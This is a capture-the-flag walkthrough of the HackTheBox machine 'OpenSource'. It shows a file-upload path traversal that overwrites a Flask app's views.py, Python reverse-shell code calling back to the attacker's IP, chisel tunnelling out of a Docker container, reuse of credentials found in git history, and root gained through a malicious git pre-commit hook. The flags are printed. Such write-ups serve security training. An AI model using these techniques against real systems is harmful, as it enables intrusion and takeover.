# Pre-Engagement
I started the box from HackTheBox, and aliased its IP as `opensource` within my `/etc/hosts` file.

# Reconnaissance
I first use `nmap` to scan some of the ports:
`nmap -T4 -oN nmap/initial opensource`

Which reveals the following:
```
Nmap scan report for opensource (10.10.11.164)
Host is up (0.17s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE    SERVICE
22/tcp   open     ssh
80/tcp   open     http
3000/tcp filtered ppp
```

I then perform an aggressive scan on those ports (full output omitted for brevity):
`nmap -A -oN nmap/aggressive -p 22,80,3000 opensource`

It doesn't reveal much besides the fact that we should probably checkout that HTTP interface:
```
Nmap scan report for opensource (10.10.11.164)
Host is up (0.40s latency).

PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 1e59057ca958c923900f7523823d055f (RSA)
|   256 48a853e7e008aa1d968652bb8856a0b7 (ECDSA)
|_  256 021f979e3c8e7a1c7caf9d5a254bb8c8 (ED25519)
80/tcp   open     http    Werkzeug/2.1.2 Python/3.10.3
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Server: Werkzeug/2.1.2 Python/3.10.3
|     Date: Sun, 05 Mar 2023 05:26:46 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 5316
|     Connection: close
(...)
|_http-title: upcloud - Upload files for Free!
|_http-server-header: Werkzeug/2.1.2 Python/3.10.3
3000/tcp filtered ppp
(...)
```

The web page had various links among which only the ones which said "Download" and "Take me there!"
worked.

![webpage](./images/web-page.png)

The "Download" link handed me a `source.zip` file which I downloaded on my machine whereas the "Take
me there!" link just landed me in a file upload page. The `source.zip` file contained a git
repository with some source code so I decided to check it out first instead of diving blindly at the
file upload page. 

Looking at the source code, it seems that this is a Flask project. At the root directory I find a
`build-docker.sh` containing some Docker commands as well as a `Dockerfile` which implies that the
app is probably running in a Docker container.

# Vulnerability Analysis
Since the source code was also a git repository, I decided to check its logs. I checked to see what
had changed since the last commit and found that the developer had turned debug mode off.

![diff](./images/diff.png)

After checking out some of the files in the first commit, and failing to find anything useful, I
checked the branches of the repo:

![branches](./images/branches.png)

I switched to the `dev` branch and saw some additional entries in the `app/app/views.py` file:

![dev-views](./images/dev-views.png)

I decided it was time to check out the file upload functionality. When trying to upload the file, I
accidentally hit the "Upload!" button without actually picking any files. Luckily, this turned out
to do me a favour.

![error](./images/error.png)

From the error message, I could see that maybe the code was still in debug mode. At least, it seemed similar to the one in the `dev` branch. To confirm this further, the `/app/app/views.py` file from the `public` branch doesn't even have a `/upcloud` route.

If we look at the code that handles the POST requests from `/upcloud`:

```py
@app.route('/upcloud', methods=['GET', 'POST'])
def upload_file():
    if request.method == 'POST':
        f = request.files['file']
        file_name = get_file_name(f.filename)
        file_path = os.path.join(os.getcwd(), "public", "uploads", file_name)
        f.save(file_path)
        return render_template('success.html', file_url=request.host_url + "uploads/" + file_name)
    return render_template('upload.html')
```

At the line before the `f.save(file_path)`, we can see that it's using `os.path.join()` giving it
the `file_name` parameter --- something we can control. So if we manage to make the value of
`file_name` start with a `/`, then the `os.path.join()` function will ignore all of the previous
paths and make the value of `file_name` our absolute path for the file. This means that we can
modify the source code of the website in order to add custom functionality which can lead us to code
execution. The way we're going to do this is by modifying the `/app/app/views.py` (we got the path
from the previous error message) with our own malicious `views.py` file.

In order to check if that logic even works, I modified the `views.py` file that was provided in the
source and added the following route:
```py
@app.route('/check', methods=['GET'])
def check_rce():
    return "this works"
```

I opened up Burp Suite and began inspecting what the request looked like.

![intercept](./images/intercept.png)

I changed the `filename` value to be `/app/app/views.py` and the upload seemed to be successful.

![upload-successful](./images/upload-success.png)

Visiting the `/check` url, showed that the `views.py` file had really been replaced by our malicious
version.

![this works](./images/this-works.png)

So now we can exploit the app.

# Exploitation

I added another route in the `views.py` with the IP and port on which `netcat` was listening to on
my machine and uploaded it as before.

```py
@app.route('/rev', methods=['GET'])
def spawn_reverse_shell():
    import socket,os,pty
    RHOST="10.10.16.4"
    RPORT=4242
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((RHOST, RPORT))
    [os.dup2(s.fileno(),fd) for fd in (0,1,2)]
    pty.spawn("/bin/sh")

    return "reverse shell spawned"
```

Now trying for the `/rev` route and it successfully connected with my netcat session. So now I have
a reverse shell.

![reverse shell](./images/spawn-rev.png)

And it also seemed that the shell had root privileges. I tried looking for the flag, but couldn't
find it. After getting lost for a while, I remembered that the source code was using Docker, so we
were probably in a Docker container.

After failing to find anything useful, I decided to check the source code again. After performing a
few `git diff` on the commits made within the `dev` branch, I found this:

![credentials-leak](./images/credentials-leak.png)

I tried to login using ssh to the server as the `dev01` user and got denied as it only seemed to
accept public keys. I suspected those credentials had to be useful somewhere but wasn't sure where.
I returned to the container to see if there was any way to escape it.

I checked to see if we could connect outside and I could. So that means I can upload custom files to
the server.

![outside connect](./images/outside-connect-works.png)

In the `nmap` scan we saw that the machine had a peculiar service running on port `3000`. I tried
accessing it from outside but it dropped my connections. So maybe it could be accessed from the
Docker container. I checked the IP of the container, and saw that it was assigned an IP of
`172.17.0.6`.

```
/app # ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
12: eth0@if13: <BROADCAST,MULTICAST,UP,LOWER_UP,M-DOWN> mtu 1500 qdisc noqueue state UP
    link/ether 02:42:ac:11:00:06 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.6/16 brd 172.17.255.255 scope global eth0
       valid_lft forever preferred_lft forever
```

From my past experience with Docker, I noticed that the host machine on which the containers ran
acted as the gateway and it's IP was always the first 3 octets of the container IP followed by a 1
so in this case, it would be `172.17.0.1`. I tried accessing the `3000` port with that IP and I
could connect successfully.

I checked the file I received, and realised that the host was running a _Gitea_ instance and was
accessible only through the container.

![gitea](./images/gitea.png)

Now what I want to do is make it so that I can access that Gitea instance from my browser. After
looking around in the internet, I found that `chisel` can be used to do just what I want.

I ran a reverse server on my machine (top):

```
chisel server -p 9021 --reverse
```

And ran the client on the Docker container:

```
chisel client 10.10.16.4:9021 R:socks
```

So now if I setup a SOCKS5 proxy on my browser at `127.0.0.1:1080`, then I can access the host
machine of the Docker container:

![chisel](./images/chisel.png)

The website had a sign in page, where I tried the `dev01` credentials and it worked.

![dev01](./images/dev01.png)

The `home-backup` repo contained our SSH keys:

![home backup](./images/home-backup.png)

I cloned the repo to my local machine, fixed permissions on the `.ssh/id_rsa` file and tried to SSH
using that private key, and I had successfully logged in.

![access](./images/access.png)

The user flag was: `c39e10ff292f1f0b6f56f8a3dabce0bb`.

# Privilege Escalation
I copied over the `linpeas.sh` file on the machine but couldn't find anything useful. 

When I typed `git log`, I noticed that the logs were very recent. In fact, they were being created
at almost every minute:

![git log](./images/git-updated.png)

So there must be something in the system that's making the commits. I searched the file system for
any files containing "git" in their names and noticed that there was a file with an interesting
name: `/usr/local/bin/git-sync`; so I checked its contents:

```bash
#!/bin/bash

cd /home/dev01/

if ! git status --porcelain; then
    echo "No changes"
else
    day=$(date +'%Y-%m-%d')
    echo "Changes detected, pushing.."
    git add .
    git commit -m "Backup for ${day}"
    git push origin main
fi
```

So the script basically monitors the home directory and checks the output of `git status
--porcelain`. If the exit status is non-zero, then it commits and pushes the changes. However, I
noticed that the `git status` command never really returns a non-zero status so the `if` block of
the script would never run.

I checked if the `dev01` had any crontabs but didn't find one, but since there's a cron running I
assumed that it was being run as root.

While reading the Pro Git book, I remembered reading a section about git hooks and how we can add
custom scripts to the `.git/hooks/` folder and they will get run whenever we perform some special
operations dictated by the filename of the script. So if there was a `.git/hooks/pre-commit` file,
then it would be run before every commit was made. So I added a shell script to spawn a reverse
shell, turned on the execute bits and made some changes to the repo so that a commit would be made.

![pre commit hook](./images/pre-commit-hook.png)

After waiting for ~1 minute, I got a connection on my netcat session. And that's how I got root.

![got root](./images/got-root.png)

The root flag was: `058780d2d7aba9000f0b077945c6c1ec`.

